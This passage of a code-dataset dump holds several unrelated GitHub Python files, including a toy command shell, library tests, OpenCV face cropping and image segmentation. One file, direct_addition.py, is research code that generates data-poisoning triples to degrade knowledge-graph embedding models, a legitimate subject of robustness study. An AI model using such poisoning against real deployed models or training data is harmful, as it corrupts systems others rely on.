start-stop coordinates scope\n overlaped_y_axis = []\n for comp_region in self.regions: \n if self.overlap(comp_region, region):\n overlaped_y_axis.append(comp_region.y_axis)\n\n overlaped_y_axis.sort()\n # Select the highest Y-axis level in used and add 1\n updated_y_axis = overlaped_y_axis[-1] + 1\n # Check if there is and empty lower level. If there are more than one select the lowest\n i = 0\n while i < len(overlaped_y_axis)-1:\n if overlaped_y_axis[i+1] > overlaped_y_axis[i] + 1:\n updated_y_axis = overlaped_y_axis[i] + 1\n break\n i+=1\n # Update the region Y-axis level value\n region.y_axis = updated_y_axis\n\n def part2_task(self):\n \"\"\"Part2 task calculation\"\"\"\n\n for segment in self.segments:\n for region in self.regions:\n if self.overlap(segment, region):\n # If a region overlap the segment add 1 to segment count\n segment.count += 1\n # Remove segments with no overlapping regions\n self.segments = [segment for segment in self.segments if segment.count>0]\n","repo_name":"AgustinPardo/Illumina-Challenge","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"10002337293","text":"import os\nimport shutil\n\nimport subprocess\n\n\nclass Shell: \n \n \n\n def __init__(self, root_path):\n \n self.root_path = root_path\n self.process = 0\n if os.path.exists('log.txt'):\n \n posR = open('log.txt','r')\n pos = posR.read()\n strings = pos.split('\\n')\n if pos.__len__() > 1:\n \n lastCommand = strings[strings.__len__()-2]\n\n self.callWrite = int(lastCommand[0])\n else:\n self.callWrite = 0\n else:\n self.log = open('log.txt','x')\n self.callWrite = 0\n \n def ls(self):\n #pasta = self.root_path\n #esta mostrado diretorios desnecessarios\n\n return os.listdir('./')\n\n def pwd(self):\n return self.root_path\n\n def cd(self, path):\n \n if path.__len__() == 1:\n os.chdir('/')\n self.root_path = os.getcwd()\n else:\n try:\n os.chdir(path[1])\n self.root_path = os.getcwd()\n \n except:\n print(\"cd: \"+path[1]+\": No such file or directory\")\n\n def cp(self, orig, dest):\n try:\n shutil.copy( orig , dest )\n except:\n print('cp: cannot stat '+orig+': No such file or directory')\n\n def mv(self, orig, dest):\n try:\n if orig == 'log.txt' or orig == 'help':\n print('no permission to remove this file press help for information')\n else:\n shutil.move( orig , dest ) \n except:\n print('mv: cannot stat '+orig+': No such file or directory') \n \n def rm(self,arq='', file=''):\n if os.path.exists(file):\n if arq == '':\n if os.path.isfile(file):\n if file == 'log.txt' or file == 'help.txt':\n print('no permission to remove file \\npress help for information')\n else:\n os.remove(file)\n\n elif os.path.isdir(file):\n print('rm: cannot remove '+file+': Is a directory')\n else:\n print('rm: cannot remove '+file+': No such file or directory')\n else:\n if arq == '-r':\n shutil.rmtree(file)\n else:\n print('rm: cannot remove '+file+': No such file or directory')\n \n def mkdir(self,pasta):\n if os.path.isdir(pasta):\n print ('mkdir: cannot create directory \"'+pasta+'\": File exists')\n else:\n os.mkdir(pasta)\n\n def uname(self):\n return os.uname() \n \n def rename(self,orig,dest):\n if os.path.exists(orig):\n os.rename(orig,dest)\n else:\n print('No such file or directory')\n\n def cat(self,arq):\n file = open(arq,'r')\n lines = file.read()\n return lines\n\n def testScript(self,script):\n if ( script[script.__len__()-3] == '.'):\n if script[script.__len__()-2] == 'p' and script[script.__len__()-1] == 'y':\n return True\n else:\n return False\n else:\n return False\n\n def exec(self,scrip):\n try:\n exec(open(scrip).read())\n\n except:\n print('error ao execultar o script')\n\n def writeLog(self,string):\n self.callWrite+=1\n self.log= open(\"log.txt\", \"a\")\n s = str(self.callWrite)+\" \"+string+\"\\n\"\n self.log.write(s)\n\n def history(self):\n return self.cat('log.txt')\n\n def grep(self, words, arquivo):\n out = []\n try:\n \n strings = self.readStrings(arquivo)\n for word in strings:\n st = word.split(' ')\n for item in st:\n if words == item:\n out.append(words) \n \n return out\n except:\n return out\n\n\n \n def readStrings(self,arquivo):\n posR = open(arquivo,'r')\n pos = posR.readlines()\n return pos\n\n \n\n\n\nif __name__ == \"__main__\":\n shell = Shell( os.getcwd())\n \n print(\"-- Welcome to Shell \\nPress -help for Commands or q to out--\\n\")\n s = ' '\n while(s != 'exit'):\n s = input(\"\"+shell.pwd()+\"# \") \n\n s1 = s.split(' ')\n if s1.__len__() == 1:\n shell.writeLog(s)\n if s1[0] == \"ls\":\n for item in shell.ls():\n print(item)\n \n elif s1[0] == \"pwd\":\n print(shell.pwd())\n \n elif s1[0] == \"uname\":\n \n 
print(shell.uname())\n \n elif s1[0] == 'help':\n print('needs help')\n\n elif s1[0] == 'history':\n print(shell.history())\n elif s1[0] == 'exit':\n pass\n else:\n print(s+\": command not found\")\n\n else:\n shell.writeLog(s)\n if s1[0] == 'cd':\n \n if( s1.__len__() == 2):\n shell.cd(s1)\n \n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'cp':\n \n if( s1.__len__() == 3):\n shell.cp(s1[1],s1[2])\n \n else:\n print(s+\": command not found\")\n\n elif s1[0] =='mv':\n \n if( s1.__len__() == 3):\n shell.mv(s1[1],s1[2])\n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'rm':\n \n if s1.__len__() == 2: \n shell.rm(file = s1[1])\n elif( s1.__len__() == 3):\n shell.rm(s1[1],s1[2])\n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'mkdir':\n \n if s1.__len__() == 2:\n shell.mkdir(s1[1])\n else: \n 'mkdir: missing operand\\nTry \"help\" for more information.'\n \n elif s1[0] == 'rename':\n if s1.__len__() == 3:\n shell.rename(s1[1],s1[2])\n else: \n 'rename error: Try \"help\" for more information.'\n\n elif s1[0] == 'cat':\n if s1.__len__() == 2:\n print(shell.cat(s1[1]))\n else: \n 'cat error: Try \"help\" for more information.'\n \n elif s1[0] == './':\n if s1.__len__() == 2:\n shell.exec(s1[1])\n \n elif s1[0] == 'grep':\n if s1.__len__() == 3:\n print(shell.grep(s1[1],s1[2]))\n\n else:\n print(s+\": command not found\")\n \n \n \n \n\n","repo_name":"RodrigoPrintes/SO","sub_path":"Shell/Shell.py","file_name":"Shell.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73273700809","text":"# proposed by \"Data Poisoning Attack against Knowledge Graph Embedding\"\n# we use the Direct Attack in the paper\n# we want to find the triple (h', r', t') = argmax(f(h,r',t') - f(h+dh, r', t'))\n# CUDA_VISIBLE_DEVICES=0 python codes/noise_generator/direct_addition.py --init_checkpoint ./models/ComplEx_FB15k-237_baseline/\n\nimport itertools\n\nimport torch\n\nfrom collections import defaultdict\nfrom random_noise import *\nimport torch.autograd as autograd\n\n\nclass DirectAddition(GlobalRandomNoiseAttacker):\n def __init__(self, args):\n super(DirectAddition, self).__init__(args)\n self.score_func = lambda s1, s2: args.lambda1 * s1 - args.lambda2 * s2\n self.name = \"direct\"\n\n self.true_rel_head, self.true_rel_tail = defaultdict(set), defaultdict(set)\n for triple in self.input_data.all_true_triples:\n self.add_true_triple(triple)\n \n def add_true_triple(self, triple):\n h, r, t = triple\n self.true_rel_tail[h].add((r, t))\n self.true_rel_head[t].add((r, h))\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n args = self.args\n h, r, t = test_triple\n true_cand = self.true_rel_tail[h] if mode == \"head-batch\" else self.true_rel_head[t]\n s = time.time()\n cand_r_list = random.choices(self.all_relations, k=args.num_cand)\n cand_e_list = random.choices(self.all_entities, k=args.num_cand)\n cand_r_e_list = list(set(zip(cand_r_list, cand_e_list)).difference(true_cand))\n cand_r_list, cand_e_list = zip(*cand_r_e_list)\n cand_r_list, cand_e_list = list(cand_r_list), list(cand_e_list)\n args.num_cand = len(cand_r_list)\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n perturbed_embed_h, perturbed_embed_t = None, None\n if mode == \"head-batch\":\n embed_h_grad = autograd.grad(score, embed_h)[0]\n perturbed_embed_h = embed_h - args.epsilon * embed_h_grad\n elif mode == \"tail-batch\":\n embed_t_grad = autograd.grad(score, embed_t)[0]\n perturbed_embed_t = embed_t - args.epsilon * embed_t_grad\n\n b_begin = 0\n cand_scores = []\n with torch.no_grad():\n while b_begin < args.num_cand:\n b_cand_r = cand_r_list[b_begin: b_begin + args.num_cand]\n b_cand_e = cand_e_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_r = self.kge_model.relation_embedding[b_cand_r]\n embed_cand_e = self.kge_model.entity_embedding[b_cand_e]\n s1, s2 = None, None\n if mode == \"head-batch\":\n s1 = self.kge_model.score_embedding(perturbed_embed_h, embed_cand_r, embed_cand_e, mode=mode)\n s2 = self.kge_model.score_embedding(embed_h, embed_cand_r, embed_cand_e, mode=mode)\n elif mode == \"tail-batch\":\n s1 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, perturbed_embed_t, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, embed_t, mode=mode)\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n if mode == \"head-batch\":\n return (h, cand_r_list[idx], cand_e_list[idx]), score.item()\n return (cand_e_list[idx], cand_r_list[idx], t), score.item()\n\n def get_noise_triples(self):\n noise_triples, args = self.noise_triples, self.args\n args.num_cand = np.math.ceil((args.nentity*args.nrelation)*args.corruption_factor / 100)\n all_true_triples = set(self.input_data.all_true_triples)\n for i in 
range(len(self.target_triples)):\n sys.stdout.write(\"%d in %d\\r\" % (i, len(self.target_triples)))\n sys.stdout.flush()\n target_triple = self.target_triples[i]\n noise_triple_h, score_h = self.get_noise_for_head(target_triple, mode=\"head-batch\")\n noise_triple_t, score_t = self.get_noise_for_head(target_triple, mode=\"tail-batch\")\n if score_h > score_t:\n noise_triples.add(noise_triple_h)\n self.add_true_triple(noise_triple_h)\n else:\n noise_triples.add(noise_triple_t)\n self.add_true_triple(noise_triple_t)\n return list(noise_triples)\n\nclass CentralDiffAddition(DirectAddition):\n def __init__(self, args):\n super(CentralDiffAddition, self).__init__(args)\n self.name = \"central_diff\"\n self.args.epsilon = self.args.learning_rate\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n args = self.args\n h, r, t = test_triple\n true_cand = self.true_rel_tail[h] if mode == \"head-batch\" else self.true_rel_head[t]\n cand_r_list = random.choices(self.all_relations, k=args.num_cand)\n cand_e_list = random.choices(self.all_entities, k=args.num_cand)\n cand_r_e_list = list(set(zip(cand_r_list, cand_e_list)).difference(true_cand))\n cand_r_list, cand_e_list = zip(*cand_r_e_list)\n cand_r_list, cand_e_list = list(cand_r_list), list(cand_e_list)\n args.num_cand = len(cand_r_list)\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n perturbed_embed_e, enforced_embed_e = None, None\n ########## begin difference ############\n if mode == \"head-batch\":\n embed_h_grad = autograd.grad(score, embed_h)[0]\n perturbed_embed_e = embed_h - args.epsilon * embed_h_grad\n enforced_embed_e = embed_h + args.epsilon * embed_h_grad\n elif mode == \"tail-batch\":\n embed_t_grad = autograd.grad(score, embed_t)[0]\n perturbed_embed_e = embed_t - args.epsilon * embed_t_grad\n enforced_embed_e = embed_t + args.epsilon * embed_t_grad\n ########## end difference ############\n\n b_begin = 0\n cand_scores = []\n while b_begin < args.num_cand:\n b_cand_r = cand_r_list[b_begin: b_begin + args.num_cand]\n b_cand_e = cand_e_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_r = self.kge_model.relation_embedding[b_cand_r]\n embed_cand_e = self.kge_model.entity_embedding[b_cand_e]\n s1, s2 = None, None\n ########## begin difference ############\n if mode == \"head-batch\":\n s1 = self.kge_model.score_embedding(perturbed_embed_e, embed_cand_r, embed_cand_e, mode=mode)\n s2 = self.kge_model.score_embedding(enforced_embed_e, embed_cand_r, embed_cand_e, mode=mode)\n elif mode == \"tail-batch\":\n s1 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, perturbed_embed_e, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, enforced_embed_e, mode=mode)\n ########## end difference ############\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n if mode == \"head-batch\":\n return (h, cand_r_list[idx], cand_e_list[idx]), score.item()\n return (cand_e_list[idx], cand_r_list[idx], t), score.item()\n\nclass DirectRelAddition(DirectAddition):\n def __init__(self, args):\n super(DirectRelAddition, self).__init__(args)\n self.score_func = lambda s1, s2: args.lambda1 * s1 - args.lambda2 * s2\n self.name = \"direct_rel\"\n self.true_head_tail = {}\n 
for h, r, t in self.input_data.all_true_triples:\n if r not in self.true_head_tail:\n self.true_head_tail[r] = set()\n self.true_head_tail[r].add((h, t))\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n if mode == \"tail-batch\":\n return test_triple, -1e9\n args = self.args\n h, r, t = test_triple\n s = time.time()\n true_cand = self.true_head_tail[r]\n cand_h_list = random.choices(self.all_entities, k=args.num_cand)\n cand_t_list = random.choices(self.all_entities, k=args.num_cand)\n cand_h_t_list = list(set(zip(cand_h_list, cand_t_list)).difference(true_cand))\n cand_h_list, cand_t_list = zip(*cand_h_t_list)\n cand_h_list, cand_t_list = list(cand_h_list), list(cand_t_list)\n args.num_cand = len(cand_h_list)\n e1 = time.time()\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n embed_r_grad = autograd.grad(score, embed_r)[0]\n perturbed_embed_r = embed_r - args.epsilon * embed_r_grad\n e2 = time.time()\n\n b_begin = 0\n cand_scores = []\n with torch.no_grad():\n while b_begin < args.num_cand:\n b_cand_h = cand_h_list[b_begin: b_begin + args.num_cand]\n b_cand_t = cand_t_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_h = self.kge_model.entity_embedding[b_cand_h]\n embed_cand_t = self.kge_model.entity_embedding[b_cand_t]\n s1 = self.kge_model.score_embedding(embed_cand_h, perturbed_embed_r, embed_cand_t, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_h, embed_r, embed_cand_t, mode=mode)\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n e3 = time.time()\n self.true_head_tail[r].add((cand_h_list[idx], cand_t_list[idx]))\n return (cand_h_list[idx], r, cand_t_list[idx]), score.item()\n\nif __name__ == \"__main__\":\n args = get_noise_args()\n override_config(args)\n \n suffix = \"\"\n if args.corruption_factor != 5:\n suffix = \"_%d\" % args.corruption_factor\n generator = DirectAddition(args)\n generator.generate(\"direct\" + suffix)\n \n generator = CentralDiffAddition(args)\n generator.generate(\"central_diff\" + suffix)\n \n generator = DirectRelAddition(args)\n generator.generate(\"direct_rel\")","repo_name":"zyksir/AdversarialAttackOnKGE","sub_path":"codes/noise_generator/direct_addition.py","file_name":"direct_addition.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"19787266098","text":"import cv2\r\n\r\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_alt2.xml')\r\n\r\ndef captureFace(img_original):\r\n frame = img_original\r\n img = frame\r\n face_area_image = img\r\n faces = face_cascade.detectMultiScale(frame, 1.1, minNeighbors = 3,minSize=(20, 20))\r\n SAFE_MARGIN_W = 0\r\n SAFE_MARGIN_H = 0\r\n\r\n for (x, y, w, h) in faces:\r\n # 画出人脸框,蓝色,画笔宽度微\r\n img = cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n # 框选出人脸区域,在人脸区域而不是全图中进行人眼检测,节省计算资源\r\n face_area = img[y:y + h, x:x + w]\r\n face_area_image = frame[y - int(h * SAFE_MARGIN_H):y + int(h * (SAFE_MARGIN_H + 1)),\r\n x - int(w * SAFE_MARGIN_W):x + int(w * (SAFE_MARGIN_W + 1))]\r\n\r\n # cv2.imshow('frameFace', face_area_image)\r\n # cv2.imshow('frame2Q', img)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n return face_area_image,len(faces),img\r\n\r\n#\r\n# img_path='89605_1958-07-06_2014.jpg'\r\n# iaaa=cv2.imread(img_path, 0)\r\n# captureFace(iaaa)\r\n\r\n","repo_name":"VincentAC-stack/Gender-Prediction","sub_path":"capture_Face.py","file_name":"capture_Face.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5836872483","text":"import os\n\ndef walk(dirname):\n\tfor name in os.listdir(dirname):\n\t\tpath = os.path.join(dirname,name)\n\n\t\tif os.path.isfile(path):\n\t\t\tprint(path)\n\t\telse:\n\t\t\twalk(path)\n\ncwd = os.getcwd()\n\nabs_path = os.path.abspath('aainw.txt')\nprint(abs_path)\nprint(os.path.exists('emma.txt'))\nprint(os.path.isdir('C:\\\\Users\\\\apost'))\nprint(os.path.isfile('output.txt'))\n#print(os.listdir(cwd))\nwalk('C:\\\\Users\\\\apost\\\\Documents\\\\_Coding')\nprint('---')\nfor root, dirs, files in os.walk('C:\\\\Users\\\\apost\\\\Documents\\\\_Coding'):\n for name in files:\n print(os.path.join(root, name))\n for name in dirs:\n print(os.path.join(root, name))\n\nfout = open('output.txt', 'w')\n\nline1 = \"This is line one.\"\nline2 = \"The is the second line.\"\nfout.write(line1)\nfout.write(line2)\n\nfout.close()","repo_name":"dominicwllmsn/thinkpython","sub_path":"exercises/chapter14/test142.py","file_name":"test142.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70270020488","text":"import numpy\n\nfrom catii import ccube, iindex\nfrom catii.ffuncs import ffunc_count, ffunc_sum\n\nfrom . import arr_eq, compare_ccube_to_xcube\n\n\nclass TestCubeCreation:\n def test_direct_construction(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n cube = ccube([idx1, idx2])\n\n assert cube.dims == [idx1, idx2]\n assert cube.intersection_data_points == 0\n assert cube.shape == (2, 2)\n\n def test_explicit_shape_arg(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n\n cube = ccube([idx1, idx2], interacting_shape=(2, 2))\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (2, 2)\n\n cube = ccube([idx1, idx2], interacting_shape=(4, 3))\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (4, 3)\n\n def test_implicit_shape_arg(self):\n # Construct indexes where the common value is the highest value,\n # to make sure we are not only looking at index values to infer shape.\n idx1 = iindex({(0,): [0, 2, 7]}, 2, (8,))\n idx2 = iindex({(0,): [0, 2, 5]}, 3, (8,))\n cube = ccube([idx1, idx2])\n\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (3, 4)\n\n\nclass TestCubeDimensions:\n def test_cube_1d_x_1d(self):\n with compare_ccube_to_xcube():\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n cube = ccube([idx1, idx2])\n assert cube.count().tolist() == [[4, 1], [1, 2]]\n\n\nclass TestCubeProduct:\n def test_cube_product(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n cube = ccube([idx1, idx1])\n result = list(cube.product())\n for subcube in result:\n for dim in subcube:\n dim[\"data\"] = {k: v.tolist() for k, v in dim[\"data\"].items()}\n assert result == [\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n )\n ]\n\n idx2 = iindex({(1, 0): [0, 2, 5], (1, 1): [3, 4]}, 0, (8, 2))\n cube = ccube([idx1, idx2])\n result = list(cube.product())\n for subcube in result:\n for dim in subcube:\n dim[\"data\"] = {\n k: v if isinstance(v, list) else v.tolist()\n for k, v in dim[\"data\"].items()\n }\n assert result == [\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (0,), \"data\": {(1,): [0, 2, 5]}},\n ),\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (1,), \"data\": {(1,): [3, 4]}},\n ),\n ]\n\n\nclass TestCubeCalculate:\n def test_cube_calculate(self):\n # [1, 0, 1, 0, 0, 0, 0, 1]\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n cube = ccube([idx1, idx1])\n counts = cube.calculate([ffunc_count()])[0]\n assert arr_eq(counts, [[5, float(\"nan\")], [float(\"nan\"), 3]])\n\n # 0: [1, 0, 1, 0, 0, 1, 0, 0],\n # 1: [0, 0, 0, 1, 1, 0, 0, 0]\n idx2 = iindex({(1, 0): [0, 2, 5], (1, 1): [3, 4]}, 0, (8, 2))\n cube = ccube([idx1, idx2])\n counts = cube.calculate([ffunc_count()])[0]\n assert arr_eq(counts, [[[4, 1], [1, 2]], [[3, 2], [3, float(\"nan\")]]])\n\n fsum = ffunc_sum((numpy.arange(8)))\n counts, sums = cube.calculate([ffunc_count(), fsum])\n assert arr_eq(counts, [[[4, 1], [1, 2]], [[3, 2], [3, float(\"nan\")]]])\n assert arr_eq(sums, [[[14, 5], [7, 2]], [[12, 7], [9, float(\"nan\")]]])\n","repo_name":"Crunch-io/catii","sub_path":"tests/test_ccubes.py","file_name":"test_ccubes.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"72736739529","text":"from matplotlib import pyplot as plt\nimport cv2\nimport numpy as np\n\ntrain_num = 7202\nval_num = 522\n\ndef BW(total, set):\n\tfor i in range(total):\n\t\tpath = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set + '/' + str(i+1) + '.jpg'\n\t\tpic = plt.imread(path)/255 # dividing by 255 to bring the pixel values between 0 and 1\n\t\t# plt.imshow(pic)\n\n\t\tpic_n = pic.reshape(pic.shape[0]*pic.shape[1], pic.shape[2])\n\t\t# print(pic_n.shape)\n\n\t\tfrom sklearn.cluster import KMeans\n\t\tkmeans = KMeans(n_clusters=2, random_state=0).fit(pic_n)\n\t\t# print(kmeans.labels_)\n\t\tpic2show = kmeans.cluster_centers_[kmeans.labels_]\n\t\t# np.histogram(pic2show)\n\t\t# plt.hist(pic2show[:, 0], bins='auto')\n\t\t# plt.show()\n\t\tflattened = pic2show.flatten()\n\t\tmean = (max(flattened) + min(flattened)) / 2\n\t\tfor r, each_row in enumerate(pic2show):\n\t\t\tfor c, col in enumerate(each_row):\n\t\t\t\tif col > mean:\n\t\t\t\t\tpic2show[r, c] = 1\n\t\t\t\telse:\n\t\t\t\t\tpic2show[r, c] = 0\n\n\t\tcluster_pic = pic2show.reshape(pic.shape[0], pic.shape[1], pic.shape[2])\n\t\tpath1 = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set + '/BW/clean' + str(i + 1) + '.jpg'\n\t\tcv2.imwrite(path1, cluster_pic * 255)\n\t# print(\"done\")\n\ndef overlap(rect, rest):\n\tfor rect_each in rest:\n\t\t_x, _y, _w, _h = rect_each\n\t\tx, y, w, h = rect\n\t\tif x + w <= _x + _w and x > _x and y + h <= _y + _h and y >= _y:\n\t\t\t# inside\n\t\t\tprint(\"{} is inside {}\".format(rect, rect_each))\n\t\t\treturn True\n\treturn False\n\ndef segment(total_num):\n\t# segmentation version 2\n\tfor i in range(total_num):\n\t\tpath = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set_name + '/BW/clean' + str(i+1) + '.jpg'\n\t\tsrc = cv2.imread(path, 1) # read input image 3 color\n\t\theight, width, channels = src.shape\n\t\tarea = height * width\n\n\t\tgray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) # convert to grayscale\n\t\tblur = cv2.blur(gray, (3, 3)) # blur the image\n\t\tret, thresh = cv2.threshold(blur, 127, 255, cv2.THRESH_BINARY)\n\n\t\tcontours,hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n\t\t# create hull array for convex hull points\n\t\thull = []\n\t\thull_vertices = []\n\n\t\trect = []\n\t\trect_vertices = []\n\n\t\tdrawing_rect = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\t\t# calculate points for each contour\n\t\tfor ci in range(len(contours)):\n\t\t\t# creating convex hull object for each contour\n\t\t\thull_vertices.append(cv2.convexHull(contours[ci], clockwise=True))\n\t\t\thull.append(cv2.convexHull(contours[ci], False))\n\t\t\tx, y, w, h = cv2.boundingRect(contours[ci])\n\t\t\trect.append([x, y, w, h])\n\n\t\tprint(area)\n\t\tfiltered_rect = []\n\t\tfor rect_info in rect:\n\t\t\tx, y, w, h = rect_info\n\t\t\tif w * h > 0.85 * area:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tfiltered_rect.append(rect_info)\n\n\t\tfiltered_rect_2 = []\n\t\tto_remove = []\n\t\tfor rect_info in filtered_rect:\n\t\t\t# points_4 = [(x, y), (x, y + w), (x + h, y + w), (x + h, y)]\n\t\t\trest = [can for can in filtered_rect if can != rect_info]\n\t\t\tis_inside = overlap(rect_info, rest)\n\t\t\tif is_inside:\n\t\t\t\tto_remove.append(rect_info)\n\n\t\t# print(filtered_rect)\n\t\tfiltered_rect_2 = [can for can in filtered_rect if can not in to_remove]\n\t\t# print(filtered_rect_2)\n\n\t\tif plot:\n\t\t\tfor each in filtered_rect_2:\n\t\t\t\tx, y, w, h = each\n\t\t\t\tcv2.rectangle(drawing_rect, (x, y), (x + w, y + h), (255, 0, 
0), 1)\n\n\t\t# save splits - sorted by vertical (y) position\n\t\timport operator, os\n\t\tfiltered_rect_2.sort(key=operator.itemgetter(1))\n\n\t\tprint(filtered_rect_2)\n\t\tfor idx, sorted_each in enumerate(filtered_rect_2):\n\t\t\tx, y, w, h = sorted_each\n\t\t\tcrop = src[y: y+h, x: x+w]\n\t\t\tout_dir = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set_name + '/Split/f' + str(i+1) + '/'\n\t\t\tif not os.path.exists(out_dir):\n\t\t\t\tos.mkdir(out_dir)\n\t\t\tout_path = out_dir + str(i) + '_' + str(idx+1) + '.jpg'\n\t\t\tcv2.imwrite(out_path, crop)\n\t\t\t# crop.save(out_path, 'jpg')\n\n\t\tif plot:\n\t\t\tcv2.imshow(\"rect\", drawing_rect)\n\t\t\t# create an empty black image\n\t\t\tdrawing_hull = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\t\t\t# draw contours and hull points (use a separate index so the outer image counter i is not clobbered)\n\t\t\tfor ci in range(len(contours)):\n\t\t\t\tcolor_contours = (0, 255, 0)  # green - color for contours\n\t\t\t\tcolor = (255, 0, 0)  # blue - color for convex hull\n\t\t\t\t# draw ci-th contour\n\t\t\t\tcv2.drawContours(drawing_hull, contours, ci, color_contours, 1, 8, hierarchy)\n\t\t\t\t# draw ci-th convex hull object\n\t\t\t\tcv2.drawContours(drawing_hull, hull, ci, color, 1, 8)\n\t\t\tcv2.imshow(\"hull\", drawing_hull)\n\t\t\tcv2.waitKey()\n\t\t\tcv2.destroyAllWindows()\n\n\n\nplot = True\ntotal_num = train_num #val_num\nset_name = 'training_set' #'validation_set'\n\n# for BW\nBW(total_num, set_name)\n","repo_name":"HarveyYan/OCR2Text","sub_path":"kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41937032938","text":"def trainIters(encoder, decoder, n_iters, batch_size=1, print_every=1000, save_every=1000, plot_every=100,\n learning_rate=0.0001):\n start = time.time()\n plot_losses = []\n val_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n # training_pairs = [sent_pairs[i] for i in range(n_iters)]\n training_pairs = [random.sample(sent_pairs, batch_size) for i in range(n_iters)]\n\n # training_pairs = [tensorsFromPair(random.choice(pairs)) for i in range(n_iters)]\n criterion = nn.NLLLoss()\n\n patience = 10 # mod Pier\n\n for iter in range(1, n_iters + 1):\n training_pair = training_pairs[iter - 1]\n # print(\"################################\")\n # print(training_pair)\n input_tensor = training_pair[0][0]\n target_tensor = training_pair[0][1]\n # print(\"printing tensors for training...\")\n # print(input_tensor)\n # print(target_tensor)\n\n loss = get_train_loss(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer,\n criterion)\n print_loss_total += loss\n plot_loss_total += loss\n\n stopping_delta = 0.01 # if improvement is not more than this amount after n tries, exit the loop\n prev_val_loss = 999\n\n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('Training loss: %s (%d %d%%) %.4f' % (timeSince(start, iter / n_iters),\n iter, iter / n_iters * 